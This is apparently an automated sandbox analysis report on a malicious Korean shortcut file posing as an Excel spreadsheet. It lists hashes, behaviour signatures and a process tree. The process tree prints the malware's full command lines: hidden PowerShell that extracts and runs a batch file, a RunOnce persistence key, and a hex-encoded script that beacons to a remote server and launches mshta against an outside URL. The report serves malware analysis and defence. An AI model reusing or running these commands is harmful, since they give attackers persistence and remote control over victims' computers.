Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/08/2023, 15:25

General

  • Target

    현황조사표.xlsx.lnk

  • Size

    24.8MB

  • MD5

    0eb8db3cbde470407f942fd63afe42b8

  • SHA1

    b93c13204acb4819c7688f847b1470ac25df52b3

  • SHA256

    a39831ecbe0792adf87f63fb99557356ba688e5f6da8c2b058d2a3d0f0d7d1e4

  • SHA512

    d2d05ac85b7e16cc26562317a043e6b90d970464e1837450ca46ffc2c3e9e3ed7e8202b98048787a23711b4af816aaa22972869db07e834ffdc1658780e57ae5

  • SSDEEP

    384:8+8+ba0vH3XVgL/mYIDm/QuG/bSbiNsvidDTn1VhGiplDQpB+H:pbXvEtIiQuGTUiSaVcw

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 16 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\현황조사표.xlsx.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1844
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\SysWOW64\cmd.exe" /c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = 'C:\Users\Admin\AppData\Local\Temp'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = 'C:\Users\Admin\AppData\Local\Temp\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^| select -Skip 62464)) -Encoding Byte; ^& $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = 'C:\Users\Admin\AppData\Local\Temp\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj ^| select -Skip 74342)) -Encoding Byte;^& C:\Windows\SysWOW64\cmd.exe /c $WH9lSPHOFI;
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4712
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = 'C:\Users\Admin\AppData\Local\Temp'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk | where-object {$_.length -eq 0x18C0000} | Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = 'C:\Users\Admin\AppData\Local\Temp\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw | select -Skip 62464)) -Encoding Byte; & $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = 'C:\Users\Admin\AppData\Local\Temp\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj | select -Skip 74342)) -Encoding Byte;& C:\Windows\SysWOW64\cmd.exe /c $WH9lSPHOFI;
        3⤵
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3644
        • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
          "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\현황조사표.xlsx"
          4⤵
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          PID:2576
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\SysWOW64\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\PMmVvG56FLC9y.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2460
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v BackupUserProfiles /t REG_SZ /f /d "C:\Windows\SysWOW64\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Protect\UserProfileSafeBackup.bat"
            5⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:3068
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$m6drsidu ="$jWHmcU="""53746172742D536C656570202D5365636F6E64732036373B0D0A246E76536B6C55626151203D2031303234202A20313032343B0D0A247969786773465679203D2024656E763A434F4D50555445524E414D45202B20272D27202B2024656E763A555345524E414D452B272D5348273B0D0A24615777203D2027687474703A2F2F37352E3131392E3133362E3230372F636F6E6669672F62617365732F636F6E6669672E70687027202B20273F553D27202B202479697867734656793B0D0A24624C6D6F69667148774A786845203D2024656E763A54454D50202B20272F4B734B273B0D0A696620282128546573742D506174682024624C6D6F69667148774A7868452929207B0D0A204E65772D4974656D50726F7065727479202D506174682022484B43553A5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E4F6E636522202D4E616D65204F6C6D202D56616C75652027633A5C77696E646F77735C73797374656D33325C636D642E657865202F6320506F7765725368656C6C2E657865202D57696E646F775374796C652068696464656E202D4E6F4C6F676F202D4E6F6E496E746572616374697665202D6570206279706173732070696E67202D6E2031202D772033313137313420322E322E322E32207C7C206D7368746120687474703A2F2F6269616E303135312E6361666532342E636F6D2F61646D696E2F626F6172642F312E68746D6C27202D50726F70657274795479706520537472696E67202D466F7263653B0D0A7D0D0A0D0A66756E6374696F6E207576415828245A547864482C202443725A79667375615042597A290D0A7B0D0A20202020246E464B467258484B465651726F4B203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E4765744279746573282443725A79667375615042597A293B0D0A202020205B53797374656D2E4E65742E48747470576562526571756573745D2024526E7A67717143203D205B53797374656D2E4E65742E576562526571756573745D3A3A43726561746528245A54786448293B0D0A2020202024526E7A677171432E4D6574686F64203D2027504F5354273B0D0A2020202024526E7A677171432E436F6E74656E7454797065203D20276170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564273B0D0A2020202024526E7A677171432E436F6E74656E744C656E677468203D20246E464B467258484B465651726F4B2E4C656E6774683B0D0A2020202024624C6D6F69667148774A78684555203D2024526E7A677171432E4765745265717565737453747265616D28293B0D0A2020202024624C6D6F69667148774A786845552E577269746528246E464B467258484B465651726F4B2C20302C20246E464B467258484B465651726F4B2E4C656E677468293B0D0A2020202024624C6D6F69667148774A786845552E466C75736828293B0D0A2020202024624C6D6F69667148774A786845552E436C6F736528293B0D0A202020205B53797374656D2E4E65742E48747470576562526573706F6E73655D20245845577742203D2024526E7A677171432E476574526573706F6E736528293B0D0A2020202024464F4F46467A6777564948203D204E65772D4F626A6563742053797374656D2E494F2E53747265616D526561646572282458455777422E476574526573706F6E736553747265616D2829293B0D0A2020202024624C6D6F69667148774A786845554C54203D2024464F4F46467A67775649482E52656164546F456E6428293B0D0A2020202072657475726E2024624C6D6F69667148774A786845554C543B0D0A7D0D0A646F0D0A7B0D0A202020205472797B0D0A2020202020202020246F7A69517575203D207576415820246157772027273B0D0A202020202020202049662028246F7A69517575202D6E6520276E756C6C27202D616E6420246F7A69517575202D6E65202727290D0A20202020202020207B0D0A202020202020202020202020246F7A695175753D246F7A695175752E537562537472696E6728312C20246F7A695175752E4C656E677468202D2032293B0D0A202020202020202020202020246250435A7562724A466F63203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E476574537472696E67285B53797374656D2E436F6E766572745D3A3A46726F6D426173653634537472696E6728246F7A6951757529293B0D0A20202020202020202020202069662028246250435A7562724A466F63290D0A2020202020202020202020207B0D0A2020202020202020202020202020202069662028246250435A7562724A466F632E436F6E7461696E732827726567656469743A2729290D0A202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020246D6274447643656E74784B3D246250435A7562724A466F632E537562537472696E672838293B0D0A202020202020202020202020202020202020202024436861724172726179203D246D6274447643656E74784B2E53706C697428277C7C27293B0D0A202020202020202020202020202020202020202069662028244368617241727261792E4C656E677468202D65712035290D0A20202020202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020202020204E65772D4974656D50726F7065727479202D5061746820244368617241727261795B305D202D4E616D6520244368617241727261795B325D202D56616C756520244368617241727261795B345D202D50726F70657274795479706520537472696E67202D466F7263653B0D0A202020202020202020202020202020202020202020202020244372724B684E464F4E46474B203D2027523D27202B205B53797374656D2E436F6E766572745D3A3A546F426173653634537472696E67285B53797374656D2E546578742E456E636F64696E675D3A3A555446382E47657442797465732827454F462729293B0D0A20202020202020202020202020202020202020202020202075764158202461577720244372724B684E464F4E46474B3B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A202020202020202020202020202020202020202020202020207D0D0A20202020202020207D0D0A202020207D2043617463687B7D0D0A7D7768696C65282474727565202D6571202474727565290D0A2020202053746172742D536C656570202D5365636F6E647320353B""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:568
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -windowstyle hidden -command "$m6drsidu ="$jWHmcU="""53746172742D536C656570202D5365636F6E64732036373B0D0A246E76536B6C55626151203D2031303234202A20313032343B0D0A247969786773465679203D2024656E763A434F4D50555445524E414D45202B20272D27202B2024656E763A555345524E414D452B272D5348273B0D0A24615777203D2027687474703A2F2F37352E3131392E3133362E3230372F636F6E6669672F62617365732F636F6E6669672E70687027202B20273F553D27202B202479697867734656793B0D0A24624C6D6F69667148774A786845203D2024656E763A54454D50202B20272F4B734B273B0D0A696620282128546573742D506174682024624C6D6F69667148774A7868452929207B0D0A204E65772D4974656D50726F7065727479202D506174682022484B43553A5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E4F6E636522202D4E616D65204F6C6D202D56616C75652027633A5C77696E646F77735C73797374656D33325C636D642E657865202F6320506F7765725368656C6C2E657865202D57696E646F775374796C652068696464656E202D4E6F4C6F676F202D4E6F6E496E746572616374697665202D6570206279706173732070696E67202D6E2031202D772033313137313420322E322E322E32207C7C206D7368746120687474703A2F2F6269616E303135312E6361666532342E636F6D2F61646D696E2F626F6172642F312E68746D6C27202D50726F70657274795479706520537472696E67202D466F7263653B0D0A7D0D0A0D0A66756E6374696F6E207576415828245A547864482C202443725A79667375615042597A290D0A7B0D0A20202020246E464B467258484B465651726F4B203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E4765744279746573282443725A79667375615042597A293B0D0A202020205B53797374656D2E4E65742E48747470576562526571756573745D2024526E7A67717143203D205B53797374656D2E4E65742E576562526571756573745D3A3A43726561746528245A54786448293B0D0A2020202024526E7A677171432E4D6574686F64203D2027504F5354273B0D0A2020202024526E7A677171432E436F6E74656E7454797065203D20276170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564273B0D0A2020202024526E7A677171432E436F6E74656E744C656E677468203D20246E464B467258484B465651726F4B2E4C656E6774683B0D0A2020202024624C6D6F69667148774A78684555203D2024526E7A677171432E4765745265717565737453747265616D28293B0D0A2020202024624C6D6F69667148774A786845552E577269746528246E464B467258484B465651726F4B2C20302C20246E464B467258484B465651726F4B2E4C656E677468293B0D0A2020202024624C6D6F69667148774A786845552E466C75736828293B0D0A2020202024624C6D6F69667148774A786845552E436C6F736528293B0D0A202020205B53797374656D2E4E65742E48747470576562526573706F6E73655D20245845577742203D2024526E7A677171432E476574526573706F6E736528293B0D0A2020202024464F4F46467A6777564948203D204E65772D4F626A6563742053797374656D2E494F2E53747265616D526561646572282458455777422E476574526573706F6E736553747265616D2829293B0D0A2020202024624C6D6F69667148774A786845554C54203D2024464F4F46467A67775649482E52656164546F456E6428293B0D0A2020202072657475726E2024624C6D6F69667148774A786845554C543B0D0A7D0D0A646F0D0A7B0D0A202020205472797B0D0A2020202020202020246F7A69517575203D207576415820246157772027273B0D0A202020202020202049662028246F7A69517575202D6E6520276E756C6C27202D616E6420246F7A69517575202D6E65202727290D0A20202020202020207B0D0A202020202020202020202020246F7A695175753D246F7A695175752E537562537472696E6728312C20246F7A695175752E4C656E677468202D2032293B0D0A202020202020202020202020246250435A7562724A466F63203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E476574537472696E67285B53797374656D2E436F6E766572745D3A3A46726F6D426173653634537472696E6728246F7A6951757529293B0D0A20202020202020202020202069662028246250435A7562724A466F63290D0A2020202020202020202020207B0D0A2020202020202020202020202020202069662028246250435A7562724A466F632E436F6E7461696E732827726567656469743A2729290D0A202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020246D6274447643656E74784B3D246250435A7562724A466F632E537562537472696E672838293B0D0A202020202020202020202020202020202020202024436861724172726179203D246D6274447643656E74784B2E53706C697428277C7C27293B0D0A202020202020202020202020202020202020202069662028244368617241727261792E4C656E677468202D65712035290D0A20202020202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020202020204E65772D4974656D50726F7065727479202D5061746820244368617241727261795B305D202D4E616D6520244368617241727261795B325D202D56616C756520244368617241727261795B345D202D50726F70657274795479706520537472696E67202D466F7263653B0D0A202020202020202020202020202020202020202020202020244372724B684E464F4E46474B203D2027523D27202B205B53797374656D2E436F6E766572745D3A3A546F426173653634537472696E67285B53797374656D2E546578742E456E636F64696E675D3A3A555446382E47657442797465732827454F462729293B0D0A20202020202020202020202020202020202020202020202075764158202461577720244372724B684E464F4E46474B3B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A202020202020202020202020202020202020202020202020207D0D0A20202020202020207D0D0A202020207D2043617463687B7D0D0A7D7768696C65282474727565202D6571202474727565290D0A2020202053746172742D536C656570202D5365636F6E647320353B""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));"
              6⤵
              • Blocklisted process makes network request
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3416

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    0774a05ce5ee4c1af7097353c9296c62

    SHA1

    658ff96b111c21c39d7ad5f510fb72f9762114bb

    SHA256

    d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4

    SHA512

    104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    73843ea6688d73ffc26264a68942e74d

    SHA1

    04695237c47d124aaf1ec7f23f1c2773ee01311d

    SHA256

    949c066a0dee7a3c362e59e98ce624f9d651e90182de979d3763265ef8924e49

    SHA512

    7854b2d495d55e5904faa0c88223c4c176e953edea247db14c986f43f52d3a8bc726c3081cc76bad8baf26926a7aa659a61708598f3062a9740fc0d798f37daf

  • C:\Users\Admin\AppData\Local\Temp\PMmVvG56FLC9y.bat

    Filesize

    5KB

    MD5

    2d444b6f72c8327d1d155faa2cca7fd7

    SHA1

    d9144b0da0d1ea7671667ffcd85448436e174486

    SHA256

    ebd20c8c63690965267c97348f4db89cb73c9974c68a586862d73a339a05e677

    SHA512

    20689adbe855bd66b8f0f691e3f07af41eafc042bc30cd051df4d77ad60cd5ae173acb418404b312a0506d6eb5c94c56775f682c1199d75986081324574c000c

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o5ejn3wa.svg.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\현황조사표.xlsx

    Filesize

    11KB

    MD5

    66165dfb784cbcb442e4767f0ca4f469

    SHA1

    11b0379445b02290ffb6a93be7fb17fd0674cd34

    SHA256

    422480a5c40bfeecbb6a8919894ee4641d37062c121dbff564e76380a81aea46

    SHA512

    2a8c16eb39c5e9b6d311fc228db928277e1082e1c6e139f70f79f11e32f034dfc8f35f38bba3a7e147afb05981730ceeb6d260bb021e88132513de783784b526

  • memory/2576-173-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-162-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-236-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-235-0x00007FF821650000-0x00007FF821660000-memory.dmp

    Filesize

    64KB

  • memory/2576-234-0x00007FF821650000-0x00007FF821660000-memory.dmp

    Filesize

    64KB

  • memory/2576-233-0x00007FF821650000-0x00007FF821660000-memory.dmp

    Filesize

    64KB

  • memory/2576-232-0x00007FF821650000-0x00007FF821660000-memory.dmp

    Filesize

    64KB

  • memory/2576-175-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-207-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-206-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-205-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-204-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-161-0x00007FF821650000-0x00007FF821660000-memory.dmp

    Filesize

    64KB

  • memory/2576-180-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-163-0x00007FF821650000-0x00007FF821660000-memory.dmp

    Filesize

    64KB

  • memory/2576-165-0x00007FF821650000-0x00007FF821660000-memory.dmp

    Filesize

    64KB

  • memory/2576-164-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-168-0x00007FF821650000-0x00007FF821660000-memory.dmp

    Filesize

    64KB

  • memory/2576-169-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-170-0x00007FF821650000-0x00007FF821660000-memory.dmp

    Filesize

    64KB

  • memory/2576-167-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-171-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-172-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-186-0x00007FF81F080000-0x00007FF81F090000-memory.dmp

    Filesize

    64KB

  • memory/2576-182-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-181-0x00007FF81F080000-0x00007FF81F090000-memory.dmp

    Filesize

    64KB

  • memory/2576-174-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2576-179-0x00007FF8615D0000-0x00007FF8617C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3416-189-0x0000000004CD0000-0x0000000004CE0000-memory.dmp

    Filesize

    64KB

  • memory/3416-188-0x0000000075110000-0x00000000758C0000-memory.dmp

    Filesize

    7.7MB

  • memory/3416-213-0x0000000004CD0000-0x0000000004CE0000-memory.dmp

    Filesize

    64KB

  • memory/3416-211-0x0000000075110000-0x00000000758C0000-memory.dmp

    Filesize

    7.7MB

  • memory/3416-212-0x0000000004CD0000-0x0000000004CE0000-memory.dmp

    Filesize

    64KB

  • memory/3416-190-0x0000000004CD0000-0x0000000004CE0000-memory.dmp

    Filesize

    64KB

  • memory/3644-159-0x0000000075110000-0x00000000758C0000-memory.dmp

    Filesize

    7.7MB

  • memory/3644-136-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

    Filesize

    64KB

  • memory/3644-187-0x0000000075110000-0x00000000758C0000-memory.dmp

    Filesize

    7.7MB

  • memory/3644-135-0x0000000004DC0000-0x0000000004DF6000-memory.dmp

    Filesize

    216KB

  • memory/3644-134-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

    Filesize

    64KB

  • memory/3644-133-0x0000000075110000-0x00000000758C0000-memory.dmp

    Filesize

    7.7MB

  • memory/3644-156-0x00000000085A0000-0x0000000008C1A000-memory.dmp

    Filesize

    6.5MB

  • memory/3644-155-0x0000000007970000-0x0000000007F14000-memory.dmp

    Filesize

    5.6MB

  • memory/3644-154-0x00000000068F0000-0x0000000006912000-memory.dmp

    Filesize

    136KB

  • memory/3644-137-0x0000000005430000-0x0000000005A58000-memory.dmp

    Filesize

    6.2MB

  • memory/3644-153-0x0000000006890000-0x00000000068AA000-memory.dmp

    Filesize

    104KB

  • memory/3644-139-0x0000000005B50000-0x0000000005BB6000-memory.dmp

    Filesize

    408KB

  • memory/3644-152-0x0000000006960000-0x00000000069F6000-memory.dmp

    Filesize

    600KB

  • memory/3644-151-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

    Filesize

    64KB

  • memory/3644-150-0x00000000063F0000-0x000000000640E000-memory.dmp

    Filesize

    120KB

  • memory/3644-138-0x0000000005AA0000-0x0000000005AC2000-memory.dmp

    Filesize

    136KB

  • memory/3644-140-0x0000000005BC0000-0x0000000005C26000-memory.dmp

    Filesize

    408KB